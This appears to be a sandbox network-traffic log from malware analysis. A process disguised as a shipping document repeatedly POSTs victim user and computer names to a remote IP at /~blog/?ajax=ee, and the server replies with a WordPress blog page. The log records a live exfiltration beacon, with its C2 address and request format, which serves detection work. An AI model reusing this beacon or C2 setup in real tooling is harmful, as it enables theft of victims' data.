Apr 25, 2024 09:43:09.957000971 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:09.957041025 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:09.957190990 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49806	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:10.231972933 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:10.365226984 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:11.193577051 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:10 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:11.193600893 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:11.193995953 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:43:11.194008112 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:43:11.194017887 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:11.202768087 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:11.203032017 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:11.203130960 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:11.203207970 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:11.203522921 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49807	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:11.469230890 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:11.599955082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:12.406363964 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:11 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:12.406382084 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:12.412800074 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:12.413032055 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:12.413162947 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:12.413599968 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:12.413742065 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:12.413813114 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:12.413831949 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:12.413845062 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49808	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:12.681066036 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:12.811932087 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:13.659035921 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:12 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:13.659121990 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:13.659195900 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:13.668746948 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:13.668795109 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:13.669081926 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:43:13.669120073 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:43:13.669173002 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:43:13.669190884 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
Apr 25, 2024 09:43:13.669229031 CEST	1289	IN	Data Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63 Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49809	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:13.935225964 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:14.065566063 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:14.907027006 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:14 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:14.907200098 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:14.907243967 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:14.916644096 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:14.917058945 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:14.917072058 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:14.917243958 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:14.917397022 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:14.917450905 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:14.917490005 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49810	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:15.173099041 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:15.304244995 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:16.120584965 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:15 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:16.120609045 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:16.120646000 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:16.128948927 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
